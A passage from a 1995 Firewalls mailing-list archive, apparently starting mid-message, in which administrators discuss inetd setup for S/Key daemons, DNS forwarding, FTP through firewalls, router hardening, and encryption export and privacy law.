enabled and will be have access >to the rest of the file system. One problem: I can't figure out how to >have the logdaemon ftpd run on another port. It can run on any port(high >ports are fine!). I can't find a compile switch or parameter on the >daemon(clients of course are no problem.) You can use tcp_wrapper programs to exec either (or none) of the two ftp servers based on incoming IP address (ACLs of IP hosts, networks or domain names). But if you just want to run an internal skey enabled ftpd on a different port than your WU-FTP daemon you should be able to create a special service name for it (ie. skeyftp) in the /etc/services file (on Unix) and run your skey ftpd out of inetd by putting an entry in the /etc/inetd.conf file for it. skeyftp stream tcp nowait root /usr/local/etc/skey.ftpd I run a inbound telnet server which uses the skey login program on TCP port 22 this way and leave the normal telnet program on port 23 (actually I often run a tarbaby telnetd on port 23 on machines likely to be attacked via telnet because of their function or hostname): # run secure key login telnet daemon on port 22 # telnetd invokes S/keylogin # skeylogin stream tcp nowait root /usr/local/etc/skey.telnetd # # tar baby telnet server telnet stream tcp nowait root /usr/local/etc/in.tarbaby.telnetd in.telnetd - Morrow From firewalls-owner Mon Oct 2 10:54:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA28062 for firewalls-outgoing; Mon, 2 Oct 1995 10:33:33 -0700 Received: from mail1.digital.com (mail1.digital.com [204.123.2.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA28055 for ; Mon, 2 Oct 1995 10:33:30 -0700 Received: from ilosrv.ilo.dec.com by mail1.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA31571; Mon, 2 Oct 1995 10:10:17 -0700 Received: from ilofrs.ilo.dec.com by ilosrv.ilo.dec.com; (5.65/1.1.8.2/12Nov94-8.2MPM) id AA07813; Mon, 2 Oct 1995 18:09:12 +0100 Received: by fwsrtr.fws.ilo.dec.com; (5.65/1.3/10May95) id AA15816; Mon, 2 Oct 1995 18:10:05 +0100 Received: from karpov.fws.ilo.dec.com by hubba.fws.ilo.dec.com; (5.65/1.1.8.2/21Aug95-8.2MPM) id AA03451; Mon, 2 Oct 1995 18:10:16 +0100 Organization: Digital Firewall Engineering Received: by karpov.fws.ilo.dec.com; (5.65v3.2/1.1.8.2/18Aug95-0213PM) id AA09875; Mon, 2 Oct 1995 18:09:42 +0100 From: Dermot Tynan Message-Id: <9510021709.AA09875@karpov.fws.ilo.dec.com> Subject: Re: your mail To: gblolmxb@ibmmail.com Date: Mon, 2 Oct 1995 18:09:42 +0000 (BST) Cc: firewalls@GreatCircle.com In-Reply-To: <199510021438.HAA21369@miles.greatcircle.com> from "gblolmxb@ibmmail.com" at Oct 2, 95 10:39:45 am Content-Type: text Content-Length: 442 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk gblolmxb@ibmmail.com wrote: > > > If I, based > in London, England, were to send an encrypted (say using PGP with a > 1024 bit key) to someone in France, and the French state found out, > who would they prosecute? They cant touch me, That was what a group of hackers on the Mururoa Atoll thought... - Der -- Dermot Tynan +353 91 754608 dtynan@ilo.dec.com DTN: 822-4608 Digital Equipment International BV, Galway, Ireland From firewalls-owner Mon Oct 2 11:03:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA28855 for firewalls-outgoing; Mon, 2 Oct 1995 10:54:22 -0700 Received: from mailhost.targetvision.com (targetvision.roc.servtech.com [204.181.11.235]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA28848 for ; Mon, 2 Oct 1995 10:54:18 -0700 Received: by localhost from mailhost.targetvision.com (router,WinSmtp -Win32- V1.07beta1.8); Mon, 02 Oct 1995 13:56:27 Received: from sybil by mailhost.targetvision.com (204.249.123.65::mail daemon,WinSmtp -Win32- V1.07beta1.8); Mon, 02 Oct 1995 13:55:51 X-Sender: Larry Helber X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Darren Reed From: Larry Helber Subject: Re: Firewall-1: Patent-pending ? Cc: Firewalls@GreatCircle.COM Date: Mon, 02 Oct 1995 13:56:27 Message-Id: <19951002135627.3800b79d.in@mailhost.targetvision.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't know the information that you are looking for but if someone has a patent pending then you will not get any information out of the patent office. A patent number and the information contained in the submitted documents does not have to be disclosed until the patent is appoved. Also a pending patent may be amended to that will defere the issue date of the patent. As long as you keep updating the patent on a yearly basis your patent will never get issued. > > >This might be streching the charter a bit... > >In the advertising material for Checkpoint's Firewall-1 (version 1.2) >which I picked up recently, there are two mentions of "patent pending". > >There is NO mention of any application numbers that I can find or any >further information on this. > >Having sent e-mail to checkpoint last week and having received no reply >(surprised - NOT) I'm wondering if this is just a game. > >Can anyone provide some more information about the pending patents, such >as application numbers or the applications themselves ? > >Thanks, >Darren > > From firewalls-owner Mon Oct 2 11:24:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29810 for firewalls-outgoing; Mon, 2 Oct 1995 11:18:59 -0700 Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.de [193.141.169.26]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA29803 for ; Mon, 2 Oct 1995 11:18:55 -0700 Received: (from uucp@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id TAA14262; Mon, 2 Oct 1995 19:12:27 +0100 Received: from grizzly.genua.de(192.109.217.33) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) id sma014260; Mon Oct 2 19:12:00 1995 Received: from grizzly.genua.de (schneck@localhost [127.0.0.1]) by grizzly.genua.de (8.6.12/8.6.12/bs01) with ESMTP id TAA10902; Mon, 2 Oct 1995 19:16:53 +0100 Message-Id: <199510021816.TAA10902@grizzly.genua.de> To: gblolmxb@ibmmail.com cc: firewalls@greatcircle.com Subject: Re: [none] MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <10898.812657809.1@grizzly.genua.de> Date: Mon, 02 Oct 1995 19:16:50 +0100 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Frank Willoughby wrote that when sending encrypted mail to a French > destination, one must supply the French Gov. with a key. If I, based > in London, England, were to send an encrypted (say using PGP with a > 1024 bit key) to someone in France, and the French state found out, > who would they prosecute? They cant touch me, and all the recipient > has to prove is that the message was unsolicited - or am I missing > something here? Yes ... your next visit to the Cote du Rhone ... \Bernhard. PS: This holds even if you send from London to me in Munich and the packets happen to hop through France. PPS: I understand this is current law, but not actively prosecuted PPPS: I'm not a lawyer (and will never be one) From firewalls-owner Mon Oct 2 11:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA29700 for firewalls-outgoing; Mon, 2 Oct 1995 11:16:46 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA29693 for ; Mon, 2 Oct 1995 11:16:39 -0700 Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA10219; Mon, 2 Oct 1995 14:15:05 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id OAA01633; Mon, 2 Oct 1995 14:14:49 -0400 Message-Id: <199510021814.OAA01633@calloway.bwh.harvard.edu> Subject: Re: non-root low ports To: ken@bridge.com (Ken Hardy) Date: Mon, 2 Oct 1995 14:14:48 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509291355.AA21881@ignatz.bridge.com> from "Ken Hardy" at Sep 29, 95 08:55:24 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 738 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken Hardy wrote: | It seems to me that it would be worthwhile to patch the kernel for the | firewall to not require root to open low ports. I cannot imagine (not | having examined the sources, yet) that it would be too difficult to | find and modify this behaviour in the BSD sources. It strikes me that a better idea (and one mentioned in C&B) is to have a small program to open the privledged port, and then exec the daemon. This has the benefits of not requiring kernel source modifications to work, and being small and somewhat closer to verifiable. So, does anyone have such a program written that they'd be willing to share? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Mon Oct 2 12:09:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01048 for firewalls-outgoing; Mon, 2 Oct 1995 11:51:41 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA01037 for ; Mon, 2 Oct 1995 11:51:33 -0700 From: Chris Tyler To: Firewalls@GreatCircle.COM Date: Mon, 2 Oct 1995 14:49 EDT Subject: Dual-DNS Problems Content-Length: 1060 Content-Type: text/plain Message-ID: <307034420.19df@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Back with more dual-DNS problems. Background: DNS server 1 is internal DNS, can't reach the real world directly, but can reach server 2. Server 2 is external DNS and 'forwarder' for internal DNS server 1. Situation 1: DNS server 1 'slave' flag in named.boot is *not present*. DNS resolves are done quickly and correctly the first time, but server 1 keeps generating UDP packets aimed at outside servers (which can't reach outside of the secure net). Situation 2: DNS server 1 'slave' flag in named.boot *is* present. Non-cached DNS resolves requested by internal hosts often (usually?) fail on the 1st tty, and sometimes on the 2nd, but almost always resolve on the 3rd try. No UDP packets from server 1 are aimed at real-world servers. Sounds like a timeout problem, but this doesn't make sense, because the timeout should happen in Situation #1 as well. *Why* is this happening? Any help... TIA. Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399 From firewalls-owner Mon Oct 2 12:24:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01514 for firewalls-outgoing; Mon, 2 Oct 1995 12:03:11 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA01507 for ; Mon, 2 Oct 1995 12:03:08 -0700 Received: from ALABAMA.CF.CS.YALE.EDU by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA09767; Mon, 2 Oct 1995 11:54:39 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id OAA14573; Mon, 2 Oct 1995 14:45:12 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id NAA27183; Mon, 2 Oct 1995 13:27:31 -0400 (EDT) Date: Mon, 2 Oct 1995 13:27:31 -0400 (EDT) Message-Id: <199510021727.NAA27183@SPARKY.CF.CS.YALE.EDU> To: ckapilla@interserver.com, firewalls@GreatCircle.COM Subject: Re: Mail Loops Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >This isn't really relevant to firewalls, but it *is* relevant to this list >because it seems to happen here regularly, i.e., those lovely mail storms. >My questions are: what causes these and what can I (and everyone else) do to >make sure that *our* systems are never responsible for one of them. Usually they are caused by some human's error in configuring a local redistribution list (a.k.a. exploder) -- for example putting the address firewalls@greatcircle.com on their local 'firewalls-list' mailing list alias. This would cause one copy of each message posted to the list to be looped back, ad infinitum. I'd normally say that regular subscribers (people not in the "loop" so to speak :-) wouldn'nt be able to do anything about it. But, upon further thinking, you probably could rig up a mail filtering agent (such as slocal, procmail, etc.) together with a database of 'seen' RFC822 Message-Ids in a manner similar to the INN USENET software uses to screen out incoming duplicate messages based on the Message-Id header. Rather than just putting such a mechanism in front of individual mailboxes, putting it in the mailstream just before the local redistribution list expansion would short-circuit infinitely looping messages. Assuming no one is munging Message-Id headers... - Morrow From firewalls-owner Mon Oct 2 12:31:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01966 for firewalls-outgoing; Mon, 2 Oct 1995 12:12:52 -0700 Received: from xs1.xs4all.nl (xs1.xs4all.nl [193.78.33.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01959 for ; Mon, 2 Oct 1995 12:12:48 -0700 From: foxtrot@xs4all.nl Received: from KEA_55402 (asd01-12.dial.xs4all.nl) by xs1.xs4all.nl with SMTP id AA22161 (5.67b/IDA-1.5 for ); Mon, 2 Oct 1995 20:11:23 +0100 Date: Mon, 2 Oct 1995 20:11:23 +0100 Message-Id: <199510021911.AA22161@xs1.xs4all.nl> X-Sender: foxtrot@xs4all.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com Subject: Access to MS routers X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is my second question about Morning Star routers on this list (BTW, thanks to the people who responded the first time).... Our MS router is situated between an application gateway (AG) on our internal network and a dial-up PPP connection to our Internet provider. First, as I'm using one (static dial-up) route to our service provider and one route to the AG I suppose I can disable dynamic routing on the MS router by deleting 'gated' and enable static routing with the line 'route add default <<>' in RC.BOOT. Am I right???? Second, I don't want any service running on my router, so I want to delete the files 'services'. That's OK??? Or should there be one entry for 'syslog' (514/udp)? Why should there be a nfsd on the router???? Is it safe to delete all protocol entries in the file 'protocol' but IP and TCP (I don't want any other protocols)??? Third, what's the use of the file smp.parties (SNMP???) and ACL.parties????? Can I delete the files 'vectors', 'tzposixrules', 'view.parties'??? Fourth, in the rc.boot file there's a line which reads 'getty tty2 9600 nowait respawn'. Does this mean that more than one person is allowed login in simultaneously??? Should 'nowait' be replaced with 'wait'??? The reason for asking these questions is that after bankrupcy of our firewall-supplier we haven't goy any documentation at all and we are evaluating our current firewall. The setup should be as minimum as possible. Again, my thanks in advance for any response, Adriaan From firewalls-owner Mon Oct 2 12:55:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01830 for firewalls-outgoing; Mon, 2 Oct 1995 12:07:32 -0700 Received: from daphne.Read.TASC.COM (daphne1.read.tasc.com [147.81.243.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01821 for ; Mon, 2 Oct 1995 12:07:24 -0700 Received: from smtpgate.read.tasc.com by daphne.Read.TASC.COM (5.x/TASC-NONDOM-1.7) id AA01400; Mon, 2 Oct 1995 15:06:25 -0400 Received: from TASCREAD-Message_Server by smtpgate.read.tasc.com with Novell_GroupWise; Mon, 02 Oct 1995 15:06:25 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 02 Oct 1995 15:05:32 -0400 From: "Robert E. Bowes" To: firewalls@GreatCircle.COM Subject: RE: -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> - 10/2/95 12:38 PM >>> > Frank Willoughby wrote that when sending encrypted mail to a French > destination, one must supply the French Gov. with a key. If I, based > in London, England, were to send an encrypted (say using PGP with a > 1024 bit key) to someone in France, and the French state found out, > who would they prosecute? They cant touch me, and all the recipient > has to prove is that the message was unsolicited - or am I missing > something here? > > Mark Blackman. > While the government of France could not do much, if anything, to you, I'm sure they could make things unpleasant for the recipient. John >>>>>>>>>>>>>>> I'm not sure what this has to do with firewalls, but since I didn't raise the issue, perhaps I can give some insight. If you send a message to someone in France using PGP, then you will use that person's public key to encrypt the message. You cannot decrypt the message because you don't have that person's private key. Therefore, the only key you could provide would be the person's public key. Your friend may have to provide his/her private key to French officials, but that's a different story. Now, if your friend sends you an encrypted message, she will use use your public key (which you've provided to the world, thus the French officials) and since you are not in France, they can't get your private key. Thus, IMO, the only thing the French officials could possibly ask for that is not publically available is your friend's secret key since he's in France and subject to French law. Does this make sense? Bob From firewalls-owner Mon Oct 2 13:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA03416 for firewalls-outgoing; Mon, 2 Oct 1995 12:54:38 -0700 Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA03408 for ; Mon, 2 Oct 1995 12:54:35 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA29381; Mon, 2 Oct 95 15:55:30 EDT Date: Mon, 2 Oct 1995 15:55:29 -0400 (EDT) From: Scott Barman To: Adam Shostack Cc: Ken Hardy , firewalls@GreatCircle.COM Subject: Re: non-root low ports In-Reply-To: <199510021814.OAA01633@calloway.bwh.harvard.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Oct 1995, Adam Shostack wrote: > Ken Hardy wrote: > > | It seems to me that it would be worthwhile to patch the kernel for the > | firewall to not require root to open low ports. I cannot imagine (not > | having examined the sources, yet) that it would be too difficult to > | find and modify this behaviour in the BSD sources. > > It strikes me that a better idea (and one mentioned in C&B) is > to have a small program to open the privledged port, and then exec the > daemon. This has the benefits of not requiring kernel source > modifications to work, and being small and somewhat closer to > verifiable. > > So, does anyone have such a program written that they'd be > willing to share? tcp_wrappers... then there's TIS' FWTK... I understand Freestone is something interesting to look at... scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Mon Oct 2 13:04:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA01462 for firewalls-outgoing; Mon, 2 Oct 1995 12:02:37 -0700 Received: from carshp.carsinfo.com (carshp.carsinfo.com [192.148.241.111]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA01455 for ; Mon, 2 Oct 1995 12:02:32 -0700 Received: by carshp.carsinfo.com (1.38.193.5/16.2) id AA21940; Mon, 2 Oct 1995 14:58:03 -0400 Date: Mon, 2 Oct 1995 14:58:02 -0400 (EDT) From: Richard Reno Subject: Re: How secure is a WAN then? To: Peter Gregory Cc: firewalls@GreatCircle.COM In-Reply-To: <9510021453.AA02912@radiatore.mccaw-stg.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Oct 1995, Peter Gregory wrote: > > My company (me.com) has offices in Europe and headquaters in the US. If we use > > didicated leased lines from the US to Europe (say from AT&T or MCI), can > > someone in between get our data? > > Absolutely. A CO switch at one of the local phone companies in this part of > the country was broken into and dedicated circuits tapped and listened to. > Because of this recent incident, my present client's "private" T1 circuits, > therefore, are link-encrypted. > > Pete > In fact there does not have to even be a breakin if there is collusion on the part of someone at the CO. Long ago in the days of Stroeger switches there was an additional path through the CO which could connect the test bench with any subscriber line. The troubleshooting personnel could dial up the desired line without any ring signal and proceed to make electrical measurements on the target line. They could also listen for noise and sound quality. Many years ago I was involved in an electronic meter reading project in a much newer digital controlled CO. We needed to be able to attach to a subscriber line and interrogate the reader without waking the customer at night. We called one of the design engineers of the CO switch and he gave us a code which when entered on the console made the line our poller was attached to a "test" line. Now we could dial any number in the CO and there was absolutly no indication on the called line. We had in effect a dialable phone tap! T1 lines enter in a somewhat different manner but still some engineer probably put this feature in for diagnostic purposes. The point is that even if there is strong security associated with such capabilities it can be subverted. In France this probably just involves a call from the security agency. Do you think it is all that different in some areas here? Richard From firewalls-owner Mon Oct 2 13:32:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04500 for firewalls-outgoing; Mon, 2 Oct 1995 13:21:52 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA04491 for ; Mon, 2 Oct 1995 13:21:48 -0700 Date: Mon, 2 Oct 1995 16:20:18 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951002162018.210456b5@hobbes.orl.mmc.com> Subject: LAWZ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk MArk rites: > 1024 bit key) to someone in France, and the French state found out, > who would they prosecute? They cant touch me, and all the recipient > has to prove is that the message was unsolicited - or am I missing > something here? Though I lack legal credentials (found a different way to say it), would suspect that you may be correct about (a) (just do not ever set foot in France since could be charged and found guilty in abstentia) I have this dim recollection about differences in "presumption of guilt" between English common law (on which much of the Amerricun system is built) and the Napoleonic code. If the recipient *had* a 1k private key (so you could encrypt with their public key), that may be required to be registered even to possess. Of course if you just used your private key to encrypt then anyone with your public key could decrypt & might be considered in "the public domain" particularly if on a public keyserver. Of course I may well be a couple of centuries out of date... Warmly, Padgett From firewalls-owner Mon Oct 2 14:23:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07106 for firewalls-outgoing; Mon, 2 Oct 1995 14:19:01 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07093 for ; Mon, 2 Oct 1995 14:18:55 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA10607; Mon, 2 Oct 95 16:15:18 -0400 Date: Mon, 2 Oct 95 16:15:18 -0400 Message-Id: <9510022015.AA10607@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "A. Padgett Peterson, P.E. Information Security" From: frankw@in.net (Frank Willoughby) Subject: Re: Encryption strength (Was How secure is a WAN...) Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From Padgett's mail: >Frank rites: > >>Also, unless you are bank or an arm of a foreign gov't I believe the largest >>exportable key size is 40 & can be broken by a brute force attack (as Netscape >>so amply demonstrated with their brilliant IDEA). > Sorry. I should have been more explicit in my comments. I was referring to the encryption product's (h/w & s/w) capabilities - in particular, the key size. Anything over 40 bits has a significantly reduced chance of getting approval for being shipped overseas unless the recipient is an agency of a (friendly) foreign governement or a bank. >May have been exactly what Marc intended... > >Really though, ITAR (International Trade in Arms Regulation) is not well >understood (AFAIR you can find a copy on eff.org) which leads to many >mythconceptions as above (actually is a facinating document to read - almost >as good as Brent's book which just arrived - he even had the effrontery >to claim I paid too much 8*). > >There is -=>NO<=- ITAR limit on the size of a key which may be sent abroad, >many of us regularly send our 1024 bit PGP keys internationally. (And BTW, >technology exists which can break 40 bit IDEA in an average of an hour and >a half). This is correct as I mentioned above. > >What ITAR limits is the export of cryptographic *equipment* (software >is equipment and if you think that is strange, in some cases ITAR >considers patented ciphers to be in the public domain) capable of >generating larger keys (there is some question about export of receive- >only software). Further, the list of exceptions to ITAR is quite long - >antivirus software is one, ATM (bank) machine transactions is another, >cable TV is YA. However if it can generate a key, it is essentially >verboden. (Violations are considered on a case by case basis so wearing >your Li'l Orphan Annie Secret Decoder Ring to Guadalahara is probably >OK but might have to get a license. Consult a shyster 8*) > This is also correct as I mentioned above. BTW, verboden is actually spelled "Verboten". >And while the nits are RIPEM, Netscape used Ron's Code number 4, not IDEA, >after an initial RSA exchange. Phil is the one who uses RSA/IDEA. I'm not too sure about this. I went back to check my mails & the author of the posting I received about the August 16th cracking of the Netscape algorithm by the french hacker) thought it was IDEA. > > Warmly, > Padgett > Best Regards, Frank From firewalls-owner Mon Oct 2 14:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07309 for firewalls-outgoing; Mon, 2 Oct 1995 14:24:03 -0700 Received: from village.zone.com (village.zone.com [204.247.108.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA07302 for ; Mon, 2 Oct 1995 14:23:57 -0700 Received: (from tonny@localhost) by village.zone.com (8.6.11/8.6.9) id OAA13099 for Firewalls@GreatCircle.Com; Mon, 2 Oct 1995 14:17:32 -0700 Date: Mon, 2 Oct 1995 14:17:32 -0700 From: Tonny Yu Message-Id: <199510022117.OAA13099@village.zone.com> To: Firewalls@GreatCircle.Com Subject: Computer ESP Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Morning Star Technologies: U.Vision Inc introduced a new Internet service, Computer ESP, two weeks ago. Computer ESP was selected as a Yahoo weekly pick within the first week of opening. Response has been overwhelming. URL: http://www.uvision.com Computer ESP is a revolutionary new Internet guide. Anyone on the Internet can now quickly and easily find comprehensive, organized, up-to-date information on over 20,000 computer manufacturers and dealers and their products. Customers can pre-set some purchasing criteria, such as price, and when it's reached, they are automatically e-mailed. Customers can also ask for price quotes. Customers can send e-mail and faxes directly from Computer ESP to most listed companies. Customers may already have contacted your company through Computer ESP. Everything is free and easy for the customers. We may have already extracted public information from your Web pages on your company and perhaps your products. This public information may include contact information, graphical location maps, job openings, product specifications, and much more. Our FREE listings may include over 400 fields. We would appreciate it if you could take a look and let us know if we need to make any corrections to the information for your company and products. Please fill out a new account form if your company is not yet listed. Also, please let us know if you are interested in fulfilling any of our growing list of quote requests. We would love to hear what you think of Computer ESP. We have several more cool features in the works. Also, please let us know if you do not want Computer ESP customers to send email to this address. Thank you. ========================================================================== Tonny Yu U.Vision.Inc President The Visibility Provider(sm) tonny@uvision.com http://www.uvision.com FAX:(415)369-1005 From firewalls-owner Mon Oct 2 15:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06779 for firewalls-outgoing; Mon, 2 Oct 1995 14:13:16 -0700 Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA06752 for ; Mon, 2 Oct 1995 14:13:04 -0700 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id RAA02810 for ; Mon, 2 Oct 1995 17:13:40 -0400 Date: Mon, 2 Oct 1995 17:13:40 -0400 Message-Id: <199510022113.RAA02810@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: FW to FW FTP w/ no port > 1023 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know a nice way to allow FTP file transfers between Firewalled sites that both do not allow TCP ports > 1023? (i.e. the screening router allows established TCP, FTP control connections (port 21), and does not allow any ports >1023) Internal users are allow to use FTP to login to non firewall protected sites using passive FTP. However, in order to have an FTP session, one of the two sides must allow arbitrary port connections. If two firewall protected sites want to talk FTP, one of the two sides must allow arbitrary ports. With our firewall, this is not allowed. Here is what it looks like (To simplify, TIS fwtk proxy not shown): Client tries passive mode... C-|----------21-control-connection---|-> S C-|---21---PASV Command--------------|-> S C-|------arbitrary-port-for-data---->| S (blocked by server side firewall) Client tries PORT command.... C-|----------21-control-connection---|-> S C-|---21-PORT--Command---------------|-> S C |<------arbitrary-port-for-data----|- S (blocked by Client side firewall) Things I have considered. ------------------------- 1. Poke a hole in the firewall and allow FTP data connections on port 20 (ftp-data). FTP client would be reprogrammed to use port 20 for data connections. Issues: Multiple concurrent FTP client listen requests could get swapped. (What happens in the FTP implementation when this occurs?) 2. Poke a range of holes in the firewall. Reprogram the FTP client to look for free ports within the range. Issues: Still required to poke several holes in the firewall, requires custom FTP software. Benefit: listen requests will not be swapped. (Best solution that I can find do far) 3. Do not use FTP and write a TCP application that uses only a single TCP port for data and control. Issues: Time + $$ no compatibility. Benefit: solves the problem. 4. Am I missing something??? Help. How are other people doing this?? Do most people just allow ports > 1023?? Thank you, --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Mon Oct 2 16:22:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12030 for firewalls-outgoing; Mon, 2 Oct 1995 16:05:40 -0700 Received: from zacatecas.optimum.com (zacatecas.optimum.com [198.81.218.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA12022 for ; Mon, 2 Oct 1995 16:05:36 -0700 Received: from optimum.com by zacatecas.optimum.com (5.67a/95032401) id AA01026; Mon, 2 Oct 1995 19:04:02 -0400 X-Sender: srp336@mail.optimum.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 2 Oct 1995 19:04:05 -0400 To: firewalls@greatcircle.com From: srp336@optimum.com (Steven R. Pfister) Subject: udprelay on SunOS 4.1.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am about to install udprelay on a Sun Sparc 5 running SunOS 4.1.3. I seem to remember hearing about a patch to udprelay that was needed to do this. Is there such a patch and where do I get it from? Thanks! Steve Pfister // Network Administrator optimum.net srp685@optimum.net From firewalls-owner Mon Oct 2 16:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12711 for firewalls-outgoing; Mon, 2 Oct 1995 16:17:12 -0700 Received: from [198.102.244.42] 